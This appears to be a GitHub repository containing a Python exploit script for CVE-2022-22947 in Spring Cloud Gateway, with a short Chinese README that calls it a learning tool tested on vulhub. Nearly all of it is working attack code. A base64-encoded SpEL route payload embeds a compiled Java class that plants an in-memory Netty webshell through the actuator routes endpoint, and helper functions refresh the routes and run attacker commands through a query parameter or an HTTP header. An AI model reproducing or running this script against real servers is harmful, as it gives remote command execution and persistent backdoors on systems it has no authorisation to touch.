├── README.md ├── img.png └── spring_cloud_gateway_memshell.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-22947 memshell 2 | ### 此脚本不完善,仅作学习用途,请勿非法使用 3 | 4 | 5 | 基于 [c0ny1](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/) 6 | 大佬的博客做的学习脚本,可写入netty和spring内存马. 7 | 8 | 测试环境为 [vulhub](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947) 9 | 10 | ``` 11 | eg:xx.py http://127.0.0.1:8080 netty whoami 12 | ``` 13 | 14 | ![img.png](img.png) 15 | 16 | -------------------------------------------------------------------------------- /img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/viemsr/spring_cloud_gateway_memshell/254b880875074cc42e83f7b712ce7a365a00602b/img.png -------------------------------------------------------------------------------- /spring_cloud_gateway_memshell.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import base64 4 | headers={'Content-Type': 'application/json'} 5 | springshell='''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''' 6 | 
nettyshell='''ewogICJwcmVkaWNhdGVzIjogWwogICAgewogICAgICAibmFtZSI6ICJQYXRoIiwKICAgICAgImFyZ3MiOiB7CiAgICAgICAgIl9nZW5rZXlfMCI6ICIvbmV3X3JvdXRlLyoqIgogICAgICB9CiAgICB9CiAgXSwKICAiZmlsdGVycyI6IFsKICAgIHsKICAgICAgIm5hbWUiOiAiUmV3cml0ZVBhdGgiLAogICAgICAiYXJncyI6IHsKICAgICAgICAiX2dlbmtleV8wIjogIiN7VChvcmcuc3ByaW5nZnJhbWV3b3JrLmNnbGliLmNvcmUuUmVmbGVjdFV0aWxzKS5kZWZpbmVDbGFzcygnTmV0dHlNZW1zaGVsbCcsVChvcmcuc3ByaW5nZnJhbWV3b3JrLnV0aWwuQmFzZTY0VXRpbHMpLmRlY29kZUZyb21TdHJpbmcoJ3l2NjZ2Z0FBQURRQkZBb0FQZ0I5Q0FCK0J3Qi9DQUJUQndDQUNnQUZBSUVLQUlJQWd3Y0FoQW9BZ2dDRkNnQ0dBSWNLQUlZQWlBb0FDQUNKQ2dBRkFJb0lBSXNLQUl3QWpRZ0FTd29BQlFDT0NnQ1BBSU1LQUk4QWtBb0FCUUNSQ0FCT0NBQ1NCd0NUQ2dBWEFIMEtBSThBbEFnQWxRY0FsZ2dBbHdzQW1BQ1pDQUNhQ0FDYkN3Q2NBSjBIQUo0TEFDRUFud2dBb0FvQW9RQ2lDZ0NoQUtNSEFLUUtBS1VBcGdvQXBRQ25DZ0NvQUtrS0FDWUFxZ2dBcXdvQUpnQ3NDZ0FtQUswSkFLNEFyd29BRndDd0NnQWJBTEVMQUxJQXN3Y0F0QWtBdFFDMkNRQzNBTGdLQUxrQXVnb0FNZ0M3Q3dDOEFKOEpBTDBBdmdnQXZ3b0FvUURBQ3dDeUFNRUpBTUlBd3dzQXhBREZCd0RHQndESEFRQUdQR2x1YVhRK0FRQURLQ2xXQVFBRVEyOWtaUUVBRDB4cGJtVk9kVzFpWlhKVVlXSnNaUUVBRWt4dlkyRnNWbUZ5YVdGaWJHVlVZV0pzWlFFQUJIUm9hWE1CQUE5TVRtVjBkSGxOWlcxemFHVnNiRHNCQUFoa2IwbHVhbVZqZEFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdBUUFWWDNaaGJDUmthWE53YjNOaFlteGxVMlZ5ZG1WeUFRQVpUR3BoZG1FdmJHRnVaeTl5Wldac1pXTjBMMFpwWld4a093RUFGSFpoYkNSa2FYTndiM05oWW14bFUyVnlkbVZ5QVFBU1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQUhYMk52Ym1acFp3RUFCbU52Ym1acFp3RUFFRjlrYjA5dVEyaGhibTVsYkVsdWFYUUJBQVowYUhKbFlXUUJBQUZwQVFBQlNRRUFDbWRsZEZSb2NtVmhaSE1CQUJwTWFtRjJZUzlzWVc1bkwzSmxabXhsWTNRdlRXVjBhRzlrT3dFQUIzUm9jbVZoWkhNQkFBRmxBUUFWVEdwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0N0FRQURiWE5uQVFBU1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0FRQU5VM1JoWTJ0TllYQlVZV0pzWlFjQXlBY0F5UWNBaEFjQWxnRUFEVzl1UTJoaGJtNWxiRWx1YVhRQkFGY29USEpsWVdOMGIzSXZibVYwZEhrdlEyOXVibVZqZEdsdmJrOWljMlZ5ZG1WeU8weHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld3N1RHcGhkbUV2Ym1WMEwxTnZZMnRsZEVGa1pISmxjM003S1ZZQkFCSmpiMjV1WldOMGFXOXVUMkp6WlhKMlpYSUJBQ0pNY21WaFkzUnZjaTl1WlhSMGVTOURiMjV1WldOMGFXOXVUMkp6WlhKMlpYSTdBUUFIWTJoaGJtNWxiQU
VBR2t4cGJ5OXVaWFIwZVM5amFHRnVibVZzTDBOb1lXNXVaV3c3QVFBTmMyOWphMlYwUVdSa2NtVnpjd0VBR0V4cVlYWmhMMjVsZEM5VGIyTnJaWFJCWkdSeVpYTnpPd0VBQ0hCcGNHVnNhVzVsQVFBaVRHbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkZCcGNHVnNhVzVsT3dFQUVFMWxkR2h2WkZCaGNtRnRaWFJsY25NQkFBdGphR0Z1Ym1Wc1VtVmhaQUVBUFNoTWFXOHZibVYwZEhrdlkyaGhibTVsYkM5RGFHRnVibVZzU0dGdVpHeGxja052Ym5SbGVIUTdUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVllCQUFOamJXUUJBQXBsZUdWalVtVnpkV3gwQVFBTGFIUjBjRkpsY1hWbGMzUUJBQ2xNYVc4dmJtVjBkSGt2YUdGdVpHeGxjaTlqYjJSbFl5OW9kSFJ3TDBoMGRIQlNaWEYxWlhOME93RUFBMk4wZUFFQUtFeHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld4SVlXNWtiR1Z5UTI5dWRHVjRkRHNIQUo0QkFBcEZlR05sY0hScGIyNXpBUUFFYzJWdVpBRUFiU2hNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNTR0Z1Wkd4bGNrTnZiblJsZUhRN1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1RHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3VW1WemNHOXVjMlZUZEdGMGRYTTdLVllCQUFkamIyNTBaWGgwQVFBR2MzUmhkSFZ6QVFBd1RHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3VW1WemNHOXVjMlZUZEdGMGRYTTdBUUFJY21WemNHOXVjMlVCQUM1TWFXOHZibVYwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwWjFiR3hJZEhSd1VtVnpjRzl1YzJVN0FRQUtVMjkxY21ObFJtbHNaUUVBRWs1bGRIUjVUV1Z0YzJobGJHd3VhbUYyWVF3QVFBQkJBUUFNYVc1cVpXTjBMWE4wWVhKMEFRQVFhbUYyWVM5c1lXNW5MMVJvY21WaFpBRUFEMnBoZG1FdmJHRnVaeTlEYkdGemN3d0F5Z0RMQndESkRBRE1BTTBCQUJCcVlYWmhMMnhoYm1jdlQySnFaV04wREFET0FNOEhBTkFNQU5FQTBnd0Ewd0RVREFEVkFOWU1BTmNBU0FFQURrNWxkSFI1VjJWaVUyVnlkbVZ5QndESURBRFlBTmtNQU5vQTJ3Y0EzQXdBMHdEZERBRGVBTllCQUE5a2IwOXVRMmhoYm01bGJFbHVhWFFCQUExT1pYUjBlVTFsYlhOb1pXeHNEQURmQU9BQkFBNXBibXBsWTNRdGMzVmpZMlZ6Y3dFQUUycGhkbUV2YkdGdVp5OUZlR05sY0hScGIyNEJBQXhwYm1wbFkzUXRaWEp5YjNJSEFPRU1BR2NBNGdFQUgzSmxZV04wYjNJdWJHVm1kQzVvZEhSd1ZISmhabVpwWTBoaGJtUnNaWElCQUJCdFpXMXphR1ZzYkY5b1lXNWtiR1Z5QndEakRBRGtBT1VCQUNkcGJ5OXVaWFIwZVM5b1lXNWtiR1Z5TDJOdlpHVmpMMmgwZEhBdlNIUjBjRkpsY1hWbGMzUU1BT1lBNXdFQUJFZFpWMEVIQU9nTUFOZ0E2UXdBMHdEcUFRQVJhbUYyWVM5MWRHbHNMMU5qWVc1dVpYSUhBT3NNQU93QTdRd0E3Z0R2QndEd0RBRHhBUElNQUVBQTh3RUFBbHhCREFEMEFQVU1BUFlBU0FjQTl3d0ErQUI0REFCMEFIVU1BUGtBUVFjQStnd0Erd0Q4QVFBemFXOHZibV
YwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwUmxabUYxYkhSR2RXeHNTSFIwY0ZKbGMzQnZibk5sQndEOURBRCtBUDhIQVFBTUFRRUJBZ2NCQXd3QkJBRUZEQUJBQVFZSEFRY0hBUWdNQVFrQkNnRUFHWFJsZUhRdmNHeGhhVzQ3SUdOb1lYSnpaWFE5VlZSR0xUZ01BTjhCQ3d3QkRBRU5Cd0VPREFFUEFSQUhBUkVNQVJJQkV3RUFKV2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJFUjFjR3hsZUVoaGJtUnNaWElCQUNkeVpXRmpkRzl5TDI1bGRIUjVMME5vWVc1dVpXeFFhWEJsYkdsdVpVTnZibVpwWjNWeVpYSUJBQkJxWVhaaEwyeGhibWN2VTNSeWFXNW5BUUFZYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtBUUFSWjJWMFJHVmpiR0Z5WldSTlpYUm9iMlFCQUVBb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN1cweHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0tVeHFZWFpoTDJ4aGJtY3ZjbVZtYkdWamRDOU5aWFJvYjJRN0FRQU5jMlYwUVdOalpYTnphV0pzWlFFQUJDaGFLVllCQUFacGJuWnZhMlVCQURrb1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN1cweHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc0JBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlCY25KaGVRRUFDV2RsZEV4bGJtZDBhQUVBRlNoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFNRRUFBMmRsZEFFQUp5aE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdEpLVXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPd0VBQ0dkbGRFTnNZWE56QVFBVEtDbE1hbUYyWVM5c1lXNW5MME5zWVhOek93RUFCMmRsZEU1aGJXVUJBQWhqYjI1MFlXbHVjd0VBR3loTWFtRjJZUzlzWVc1bkwwTm9ZWEpUWlhGMVpXNWpaVHNwV2dFQUVHZGxkRVJsWTJ4aGNtVmtSbWxsYkdRQkFDMG9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pEc0JBQmRxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlHYVdWc1pBRUFKaWhNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBTloyVjBVM1Z3WlhKamJHRnpjd0VBQTNObGRBRUFKeWhNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVmdFQUdHbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkFFQUpDZ3BUR2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJGQnBjR1ZzYVc1bE93RUFJR2x2TDI1bGRIUjVMMk5vWVc1dVpXd3ZRMmhoYm01bGJGQnBjR1ZzYVc1bEFRQUpZV1JrUW1WbWIzSmxBUUJwS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzB4cVlYWmhMMnhoYm1jdlUzUnlhVzVuTzB4cGJ5OXVaWFIwZVM5amFHRnVibVZzTDBOb1lXNXVaV3hJWVc1a2JHVnlPeWxNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNVR2x3Wld4cGJtVTdBUUFIYUdWaFpHVnljd0VBS3lncFRHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUlkSFJ3U0dWaFpHVnljenNCQUNkcGJ5OXVaWF
IwZVM5b1lXNWtiR1Z5TDJOdlpHVmpMMmgwZEhBdlNIUjBjRWhsWVdSbGNuTUJBQlVvVEdwaGRtRXZiR0Z1Wnk5VGRISnBibWM3S1ZvQkFDWW9UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwyeGhibWN2VTNSeWFXNW5Pd0VBRVdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsQVFBS1oyVjBVblZ1ZEdsdFpRRUFGU2dwVEdwaGRtRXZiR0Z1Wnk5U2RXNTBhVzFsT3dFQUJHVjRaV01CQUNjb1RHcGhkbUV2YkdGdVp5OVRkSEpwYm1jN0tVeHFZWFpoTDJ4aGJtY3ZVSEp2WTJWemN6c0JBQkZxWVhaaEwyeGhibWN2VUhKdlkyVnpjd0VBRG1kbGRFbHVjSFYwVTNSeVpXRnRBUUFYS0NsTWFtRjJZUzlwYnk5SmJuQjFkRk4wY21WaGJUc0JBQmdvVEdwaGRtRXZhVzh2U1c1d2RYUlRkSEpsWVcwN0tWWUJBQXgxYzJWRVpXeHBiV2wwWlhJQkFDY29UR3BoZG1FdmJHRnVaeTlUZEhKcGJtYzdLVXhxWVhaaEwzVjBhV3d2VTJOaGJtNWxjanNCQUFSdVpYaDBBUUF1YVc4dmJtVjBkSGt2YUdGdVpHeGxjaTlqYjJSbFl5OW9kSFJ3TDBoMGRIQlNaWE53YjI1elpWTjBZWFIxY3dFQUFrOUxBUUFQY0hKcGJuUlRkR0ZqYTFSeVlXTmxBUUFtYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNTR0Z1Wkd4bGNrTnZiblJsZUhRQkFBOW1hWEpsUTJoaGJtNWxiRkpsWVdRQkFEd29UR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdLVXhwYnk5dVpYUjBlUzlqYUdGdWJtVnNMME5vWVc1dVpXeElZVzVrYkdWeVEyOXVkR1Y0ZERzQkFDZHBieTl1WlhSMGVTOW9ZVzVrYkdWeUwyTnZaR1ZqTDJoMGRIQXZTSFIwY0ZabGNuTnBiMjRCQUFoSVZGUlFYekZmTVFFQUtVeHBieTl1WlhSMGVTOW9ZVzVrYkdWeUwyTnZaR1ZqTDJoMGRIQXZTSFIwY0ZabGNuTnBiMjQ3QVFBWmFXOHZibVYwZEhrdmRYUnBiQzlEYUdGeWMyVjBWWFJwYkFFQUJWVlVSbDg0QVFBYVRHcGhkbUV2Ym1sdkwyTm9ZWEp6WlhRdlEyaGhjbk5sZERzQkFCaHBieTl1WlhSMGVTOWlkV1ptWlhJdlZXNXdiMjlzWldRQkFBeGpiM0JwWldSQ2RXWm1aWElCQUUwb1RHcGhkbUV2YkdGdVp5OURhR0Z5VTJWeGRXVnVZMlU3VEdwaGRtRXZibWx2TDJOb1lYSnpaWFF2UTJoaGNuTmxkRHNwVEdsdkwyNWxkSFI1TDJKMVptWmxjaTlDZVhSbFFuVm1Pd0VBZFNoTWFXOHZibVYwZEhrdmFHRnVaR3hsY2k5amIyUmxZeTlvZEhSd0wwaDBkSEJXWlhKemFXOXVPMHhwYnk5dVpYUjBlUzlvWVc1a2JHVnlMMk52WkdWakwyaDBkSEF2U0hSMGNGSmxjM0J2Ym5ObFUzUmhkSFZ6TzB4cGJ5OXVaWFIwZVM5aWRXWm1aWEl2UW5sMFpVSjFaanNwVmdFQUxHbHZMMjVsZEhSNUwyaGhibVJzWlhJdlkyOWtaV012YUhSMGNDOUdkV3hzU0hSMGNGSmxjM0J2Ym5ObEFRQXJhVzh2Ym1WMGRIa3ZhR0Z1Wkd4bGNpOWpiMlJsWXk5b2RIUndMMGgwZEhCSVpXRmtaWEpPWVcxbGN3RUFERU5QVGxSRlRsUmZWRmxRUlFFQUcweHBieTl1WlhSMGVTOTFkR2xzTDBGelkybHBVM1J5YVc1bk93RUFWU2hNYW1GMllTOXNZVzVuTDBOb1lYSlRaWEYxWlc1alpUdE1hbU
YyWVM5c1lXNW5MMDlpYW1WamREc3BUR2x2TDI1bGRIUjVMMmhoYm1Sc1pYSXZZMjlrWldNdmFIUjBjQzlJZEhSd1NHVmhaR1Z5Y3pzQkFBMTNjbWwwWlVGdVpFWnNkWE5vQVFBMEtFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bE1hVzh2Ym1WMGRIa3ZZMmhoYm01bGJDOURhR0Z1Ym1Wc1JuVjBkWEpsT3dFQUptbHZMMjVsZEhSNUwyTm9ZVzV1Wld3dlEyaGhibTVsYkVaMWRIVnlaVXhwYzNSbGJtVnlBUUFGUTB4UFUwVUJBQ2hNYVc4dmJtVjBkSGt2WTJoaGJtNWxiQzlEYUdGdWJtVnNSblYwZFhKbFRHbHpkR1Z1WlhJN0FRQWVhVzh2Ym1WMGRIa3ZZMmhoYm01bGJDOURhR0Z1Ym1Wc1JuVjBkWEpsQVFBTFlXUmtUR2x6ZEdWdVpYSUJBRklvVEdsdkwyNWxkSFI1TDNWMGFXd3ZZMjl1WTNWeWNtVnVkQzlIWlc1bGNtbGpSblYwZFhKbFRHbHpkR1Z1WlhJN0tVeHBieTl1WlhSMGVTOWphR0Z1Ym1Wc0wwTm9ZVzV1Wld4R2RYUjFjbVU3QUNFQUZ3QStBQUVBUHdBQUFBVUFBUUJBQUVFQUFRQkNBQUFBTHdBQkFBRUFBQUFGS3JjQUFiRUFBQUFDQUVNQUFBQUdBQUVBQUFBT0FFUUFBQUFNQUFFQUFBQUZBRVVBUmdBQUFBa0FSd0JJQUFFQVFnQUFBY01BQkFBS0FBQUF0UklDU3hJREVnUUR2UUFGdGdBR1RDc0V0Z0FIS3dFRHZRQUl0Z0FKVFFNK0hTeTRBQXFpQUljc0hiZ0FDem9FR1FUR0FIVVpCTFlBRExZQURSSU90Z0FQbVFCbEdRUzJBQXdTRUxZQUVUb0ZHUVVFdGdBU0dRVVpCTFlBRXpvR0dRYTJBQXkyQUJRU0ZiWUFFVG9IR1FjRXRnQVNHUWNaQnJZQUV6b0lHUWkyQUF5MkFCUzJBQlFTRnJZQUVUb0pHUWtFdGdBU0dRa1pDTHNBRjFtM0FCaTJBQmtTR2t1RUF3R24vM2VuQUFkTUVoeExLckFBQVFBREFLd0Fyd0FiQUFNQVF3QUFBRm9BRmdBQUFCQUFBd0FTQUE4QUV3QVVBQlFBSGdBV0FDZ0FGd0F2QUJnQVJBQVpBRkFBR2dCV0FCc0FYd0FjQUc0QUhRQjBBQjRBZlFBZkFJOEFJQUNWQUNFQW93QWlBS1lBRmdDc0FDY0Fyd0FsQUxBQUpnQ3pBQ2dBUkFBQUFIQUFDd0JRQUZZQVNRQktBQVVBWHdCSEFFc0FUQUFHQUc0QU9BQk5BRW9BQndCOUFDa0FUZ0JNQUFnQWp3QVhBRThBU2dBSkFDOEFkd0JRQUV3QUJBQWdBSXdBVVFCU0FBTUFEd0NkQUZNQVZBQUJBQjRBamdCVkFFd0FBZ0N3QUFNQVZnQlhBQUVBQXdDeUFGZ0FXUUFBQUZvQUFBQWVBQVgvQUNBQUJBY0FXd2NBWEFjQVhRRUFBUHNBaGZnQUJVSUhBRjREQUFFQVh3QmdBQUlBUWdBQUFIWUFCUUFGQUFBQUhDeTVBQjBCQURvRUdRUVNIaElmdXdBWFdiY0FHTGtBSUFRQVY3RUFBQUFDQUVNQUFBQU9BQU1BQUFBdUFBZ0FNQUFiQURFQVJBQUFBRFFBQlFBQUFCd0FSUUJHQUFBQUFBQWNBR0VBWWdBQkFBQUFIQUJqQUdRQUFnQUFBQndBWlFCbUFBTUFDQUFVQUdjQWFBQUVBR2tBQUFBTkF3QmhBQUFBWXdBQUFHVUFBQUFCQUdvQWF3QURBRUlBQUFFUUFBUUFCZ0FBQUdFc3dRQWhtUUJVTE1BQUlVNHR1UUFpQVFBU0k3WUFKSmtBTnkyNUFDSUJBQklqdGdBbE9nUzdBQ1padUFBbkdRUzJBQ2kyQUNtM0FDb1NLN1
lBTExZQUxUb0ZLaXNaQmJJQUxyY0FMN0duQUFvNkJCa0V0Z0F3S3l5NUFERUNBRmV4QUFFQURBQk5BRkVBR3dBREFFTUFBQUF5QUF3QUFBQTNBQWNBT0FBTUFEb0FHZ0E3QUNjQVBBQkRBRDRBVFFBL0FFNEFRd0JSQUVFQVV3QkNBRmdBUlFCZ0FFWUFSQUFBQUVnQUJ3QW5BQ2NBYkFCWkFBUUFRd0FMQUcwQVdRQUZBRk1BQlFCV0FGY0FCQUFNQUV3QWJnQnZBQU1BQUFCaEFFVUFSZ0FBQUFBQVlRQndBSEVBQVFBQUFHRUFXQUJNQUFJQVdnQUFBQThBQS93QVRnY0Fja0lIQUY3NkFBWUFjd0FBQUFRQUFRQWJBR2tBQUFBSkFnQndBQUFBV0FBQUFBSUFkQUIxQUFJQVFnQUFBSlFBQmdBRkFBQUFOcnNBTWxteUFETXRMTElBTkxnQU5iY0FOam9FR1FTNUFEY0JBTElBT0JJNXRnQTZWeXNaQkxrQU93SUFzZ0E4dVFBOUFnQlhzUUFBQUFJQVF3QUFBQklBQkFBQUFFb0FGQUJMQUNRQVRBQTFBRTBBUkFBQUFEUUFCUUFBQURZQVJRQkdBQUFBQUFBMkFIQUFjUUFCQUFBQU5nQjJBRmtBQWdBQUFEWUFkd0I0QUFNQUZBQWlBSGtBZWdBRUFHa0FBQUFOQXdCd0FBQUFkZ0FBQUhjQUFBQUJBSHNBQUFBQ0FIdz0nKSxuZXcgamF2YXgubWFuYWdlbWVudC5sb2FkaW5nLk1MZXQobmV3IGphdmEubmV0LlVSTFswXSxUKGphdmEubGFuZy5UaHJlYWQpLmN1cnJlbnRUaHJlYWQoKS5nZXRDb250ZXh0Q2xhc3NMb2FkZXIoKSkpLmRvSW5qZWN0KCl9IiwKICAgICAgICAiX2dlbmtleV8xIjogIi8ke3BhdGh9IgogICAgICB9CiAgICB9CiAgXSwKICAidXJpIjogImh0dHBzOi8vd3lhLnBsIiwKICAib3JkZXIiOiAwCn0=''' 7 | 8 | 9 | def sendspring(url): 10 | 11 | rsp=requests.post(url+"/actuator/gateway/routes/new_route", data=base64.b64decode(springshell).decode(), headers=headers) 12 | if rsp.status_code!=201: 13 | print("注入失败") 14 | exit(0) 15 | 16 | def sendnetty(url): 17 | rsp = requests.post(url+"/actuator/gateway/routes/new_route",data=base64.b64decode(nettyshell).decode(),headers=headers) 18 | if rsp.status_code!=201: 19 | print("注入失败") 20 | exit(0) 21 | 22 | def refresh(url): 23 | 24 | rsp =requests.post(url+"/actuator/gateway/refresh",data="{}",headers=headers) 25 | print(rsp.status_code,rsp.text) 26 | 27 | def echospring(url,cmd): 28 | headers={"Connection": "close"} 29 | rsp=requests.get(url+"/GYWA?cmd={}".format(cmd), headers=headers) 30 | print("shell地址:"+url+"/GYWA?cmd={}".format(cmd)) 31 | print("无响应命令则注入失败:") 32 | print(rsp.text) 33 | 34 | def echonetty(url,cmd): 35 | headers={"Connection": "close", "GYWA": cmd} 36 | rsp = 
requests.get(url,headers=headers) 37 | print("shell地址:"+url+ "/任意路径,头部加上GYWA:cmd即可".format(cmd)) 38 | print("无响应命令则注入失败:") 39 | print(rsp.text) 40 | 41 | 42 | 43 | # sendnetty(url) 44 | 45 | if __name__ == '__main__': 46 | 47 | if len(sys.argv)<4: 48 | print("xx.py typeshell(spring or netty) cmd") 49 | print("eg:xx.py http://127.0.0.1:8080 netty whoami") 50 | exit() 51 | url=sys.argv[1] 52 | typeshell=sys.argv[2] 53 | cmd=sys.argv[3] 54 | if typeshell=="netty": 55 | sendnetty(url) 56 | refresh(url) 57 | echonetty(url,cmd) 58 | else: 59 | sendspring(url) 60 | refresh(url) 61 | echospring(url,cmd) 62 | 63 | --------------------------------------------------------------------------------